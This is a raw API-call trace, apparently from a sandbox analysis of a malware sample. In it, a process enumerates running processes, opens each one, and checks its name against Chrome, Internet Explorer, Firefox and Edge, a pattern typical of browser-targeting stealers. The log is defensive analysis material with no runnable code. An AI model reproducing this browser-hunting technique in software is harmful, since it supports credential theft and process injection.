	[0251.096] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0251.097] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0xa154
	[0251.097] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.097] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0251.097] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.097] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.097] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.098] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0251.098] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.098] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.098] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0251.099] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0xa158
	[0251.099] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.099] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0251.099] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.099] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.100] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.100] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0251.100] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.100] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.100] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0251.101] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0xa15c
	[0251.101] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.101] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0251.102] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.102] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.102] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.102] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0251.102] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.102] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.103] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0251.103] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0xa160
	[0251.103] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.104] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0251.104] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.104] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.104] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.104] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0251.105] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.105] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.105] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0251.106] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0xa164
	[0251.106] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.106] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0251.106] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.106] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.106] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.106] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0251.107] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.107] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.107] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0251.108] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0xa168
	[0251.108] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.108] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0251.108] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.108] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.109] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.109] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0251.109] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.109] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.109] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0251.110] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0xa16c
	[0251.110] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.110] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0251.111] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.111] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.111] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.111] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0251.111] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.111] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.111] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0251.112] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0xa170
	[0251.112] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.112] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0251.113] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.113] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.113] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.113] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0251.113] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.113] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.114] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0251.115] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0xa174
	[0251.115] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.115] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0251.115] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.115] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.115] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.116] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0251.116] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.116] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.116] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0251.117] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0xa178
	[0251.117] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.117] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0251.117] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.117] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.118] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.118] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0251.118] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.118] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.118] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0251.119] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0xa17c
	[0251.119] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.119] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0251.120] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.120] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.120] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.120] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0251.120] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.120] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.121] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0251.122] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0xa180
	[0251.122] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.122] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0251.122] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.122] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.122] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.122] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0251.123] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.123] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.123] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0251.124] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0xa184
	[0251.124] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.124] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0251.124] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.124] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.125] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.125] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0251.125] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.125] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.125] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0251.126] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0xa188
	[0251.126] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.126] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0251.126] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.126] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.127] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.127] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0251.127] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.127] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.127] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0251.128] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0xa18c
	[0251.128] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.128] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0251.129] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.129] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.129] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.129] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0251.130] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.130] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.130] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0251.131] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0xa190
	[0251.131] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.131] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0251.131] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.131] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.132] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.132] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0251.132] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.132] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.132] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0251.133] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0xa194
	[0251.134] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.134] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0251.134] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.134] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.134] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.134] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0251.135] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.135] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.135] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0251.136] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0251.136] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0251.137] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0xa198
	[0251.137] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.137] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0251.137] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.137] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.138] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.138] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0251.139] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.139] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.139] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0251.140] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0xa19c
	[0251.140] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.140] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0251.140] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.140] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.141] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.141] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0251.141] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.141] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.141] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0251.142] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0xa1a0
	[0251.142] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.142] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0251.143] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.143] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.143] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.143] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0251.143] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.143] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.144] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0251.144] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0xa1a4
	[0251.144] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.144] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0251.145] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.145] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.145] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.145] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0251.146] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.146] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.146] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0251.147] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0xa1a8
	[0251.147] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.147] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0251.148] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.148] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.148] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.148] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0251.149] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.149] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.149] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0251.150] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0xa1ac
	[0251.150] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.150] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0251.150] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.150] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.151] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.151] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0251.151] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.151] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.151] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0251.152] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0xa1b0
	[0251.152] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.152] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0251.153] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.153] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.153] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.153] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0251.154] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.154] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.154] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0251.155] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0xa1b4
